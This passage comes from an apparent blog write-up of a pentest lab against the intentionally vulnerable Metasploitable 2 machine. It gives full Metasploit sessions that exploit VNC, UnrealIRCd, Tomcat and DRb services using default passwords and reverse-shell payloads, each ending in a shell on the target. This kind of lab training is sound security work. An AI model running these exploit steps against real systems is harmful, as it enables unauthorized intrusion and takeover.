[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2770
[+] Found netlink pid: 2769
[*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb
[*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR
[*] chmod'ing and running it...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2014-06-06 23:03:13 +0300

whoami
root

So, the same exploit that I manually used earlier was very easy and quick in Metasploit. Onwards!

Port 5900 vnc

The Nessus scan reported that the server is using the password ‘password’. So I will use vncviewer to connect to it:

vncviewer 192.168.127.154
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

vnc

And we have another root shell.

Port 6667 irc

An exploit is available for this:

UnrealIRCD 3.2.8.1 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse 
payload => cmd/unix/reverse
msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.127.154:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qcHh6jsH8rZghWdi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qcHh6jsH8rZghWdi\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2014-06-06 23:31:44 +0300

whoami
root

Port 8180 tomcat

First, let’s see what information we can get using the Tomcat Administration Tool Default Access module:

msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        Use a proxy chain
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        8180             yes       The target port
   THREADS      1                yes       The number of concurrent threads
   TOMCAT_PASS                   no        The password for the specified username
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(tomcat_administration) > run

[*] http://192.168.127.154:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With credentials in hand, now we can use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit:

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in > this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set payload  java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.127.159:8888 
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war ...
[*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp...
[*] Undeploying RuoE02Uo7DeSsaVp7nmb79cq ...
[*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2014-06-06 23:51:01 +0300

whoami
tomcat55

We can elevate our privileges using the udev exploit from earlier, so I won’t go over it again.

Port 8787 drb

First I wanted to know what this drb is, since I wasn’t familiar with it.

Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes (Wikipedia)

Then I searched in Metasploit for an exploit, and luckily, I got a hit:

Distributed Ruby Send instance_eval/syscall Code Execution

This module exploits remote code execution vulnerabilities in dRuby

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   URI                    yes       The dRuby URI of the target host (druby://host:port)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
URI => druby://192.168.127.154:8787

msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[-] Exploit failed: Errno::EINVAL Invalid argument
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7Kx3j4QvoI7LOU5z;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7Kx3j4QvoI7LOU5z\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2014-06-08 16:51:56 +0300

whoami
root

Another port, another shell!

This turned out to be a a very lengthy post. There were some ports I couldn’t find an exploit for, so can’t determine if the underlying services were exploitable or not. Overall, owning Metasploitable in multiple ways and documenting it was the goal of this post.

Today’s cookie:

You will be a winner today. Pick a fight with a four-year-old.

Core dump overflow

Core dump in progress...

Pentest lab - Metasploitable 2

Port 21 vsftpd

Port 22 ssh

Port 23 telnet

Port 80 apache

Port 445 samba

Port 514 tcpwrapped

Port 1099 java-rmi

Port 1524 shell

Port 2049 nfs

Port 3306 mysql

Port 3632 distccd

Port 5432 postgresql

Port 5900 vnc

Port 6667 irc

Port 8180 tomcat

Port 8787 drb

Comments